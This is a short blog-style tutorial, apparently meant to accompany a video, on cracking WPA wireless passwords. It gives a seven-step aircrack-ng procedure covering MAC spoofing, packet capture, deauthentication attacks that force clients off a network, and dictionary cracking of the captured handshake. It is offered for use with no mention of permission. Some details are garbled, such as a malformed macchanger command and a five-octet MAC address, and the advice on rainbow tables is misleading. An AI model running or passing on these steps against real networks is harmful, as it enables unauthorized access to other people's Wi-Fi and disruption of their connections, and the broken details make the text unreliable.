I’ve been meaning to do a tutorial on cracking WPA wireless for quite a while, but I found this video that explains the methodology really simple. Let me say that cracking WPA is not like cracking WEP, in WEP you’re exploiting a vulnerability in the way the encryption algorithm is implemented, but in WPA the only vulnerability will be in the strength of the user passphrase. Yes you’ve guessed it, when cracking WPA basically what you’re doing is brute-forcing the user password, in other words the success of your attack will depend on your dictionary or password list. If the user’s passphrase is not in your dictionary, you will never crack the WPA key. There are several types of WPA dictionary list out there, but I highly recommend using rainbow-tables which can be several Gigs in size. How to find them?… Google is your friend!

Steps:
1- airmon-ng stop wlan0
2- ifconfig wlan0 down
3- macchanger -mac 00:11:22:33:55 wlan0
4- airmon-ng start wlan0
5- airodump-ng -c channel -w filename -bssid bssid wlan0
6- aireplay-ng -0 5 -a bssid wlan0
7- aircrack-ng file.cap -w /dictionary path

Video: